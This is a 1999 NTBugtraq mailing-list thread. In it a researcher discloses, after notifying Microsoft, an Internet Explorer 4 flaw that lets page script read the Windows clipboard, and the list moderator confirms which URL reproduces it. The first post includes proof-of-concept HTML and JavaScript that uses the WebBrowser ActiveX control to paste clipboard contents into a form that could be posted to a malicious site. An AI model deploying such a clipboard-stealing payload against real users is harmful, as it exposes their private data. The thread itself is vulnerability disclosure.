Date: Mon, 22 Feb 1999 23:39:07 +0100
From: Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: New IE4 vulnerability : the clipboard again.

Greetings, 

I have discovered another IE 4 clipboard vulnerability. The clipboard 
content can be made public by a very simple javascript code.

I reported the problem to Microsoft on Feb 10. They confirmed the 
problem. It seems that they were already aware of the problem and It 
will be fixed in the next IE 4 service pack.

The problem is located in the Internet WebBrowser ActiveX object.

Regards,
Juan Carlos

More info and a demo is available at :
http://pages.whowhere.com/computers/cuartangojc

Regards,

Juan Carlos


The Clipboard vulnerability demo
http://pages.whowhere.lycos.com/computers/cuartangojc/cb.html

----------
<body onload="wb.navigate('http://pages.whowhere.com/computers/cuartangojc/blank.html')">
<script>

function pt()
{

if (document.forms(0).S1.value == "" )
        {
        wb.focus();
        wb.Document.execCommand("paste");       
        document.forms(0).S1.value = wb.Document.body.innerText;
        }
}
function StartJob()
{
document.forms(0).S1.value = "";
wb.focus();
wb.Document.execCommand("paste");       
window.setTimeout("pt()",1000);
}
</script>

According with Microsoft security rules access to Windows clipboard content 
is forbidden to Internet Explorer scripts unless the clipboard content was 
owned by the Explorer itself. If an script performs a paste operation over 
an input text box the operation will succeed only if data were copied to 
the clipboard from the Internet Explorer. 

There is a way to circumvent this protection by using a Microsoft Web Browser 
ActiveX control this object can perform a paste operation without security 
restrictions. The clipboard data can then be transferred to a form input box 
and posted to a malicious WEB.

The box below is a Input Text Area Box your clipboard text data must be here, 
if not then do a copy (from any application) and then reload this page.

<form method="POST" action="--WEBBOT-SELF--">
  <!--webbot bot="SaveResults" startspan U-File="_private/form_results.txt"
  S-Format="TEXT/CSV" S-Label-Fields="TRUE" --><!--webbot bot="SaveResults" endspan --><p><textarea

  rows="3" name="S1" cols="82"></textarea></p>
</form>

The box below is a Microsoft Web Browser ActiveX control.

<object classid="clsid:8856F961-340A-11D0-A96B-00C04FD705A2" width="530" height="150"
id="wb">
</object>

---------------------------------------------------------------------------

Date: Wed, 24 Feb 1999 11:21:03 -0500
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: New IE4 vulnerability : the clipboard again.

Marc Berajano said...

>i, like mnemonix, got the access denied error when IE used the
>http://pages.whowhere.lycos.com/computers/cuartangojc/cb.html URL, but
>i don't get that error using the
>http://pages.whowhere.com/computers/cuartangojc/cb.html URL as your
>web page says.  however, even when i do use the correct URL, my
>clipboard contents are not shown.  i'm using the public beta 2 of IE 5
>(5.00.0910.1309) on NT4 SP4.

and I would add that my clipboard contents DO SHOW using;

NT 4.0 SP1
IE 4.0 version 4.72.3110.8 128-bit SP1, 2735, 2922;

So it seems that the URL makes a big difference to demonstrating Juan
Carlos' vulnerability.

Use http://pages.whowhere.com/computers/cuartangojc/cb.html to test
yourself.

Cheers,
Russ - NTBugtraq moderator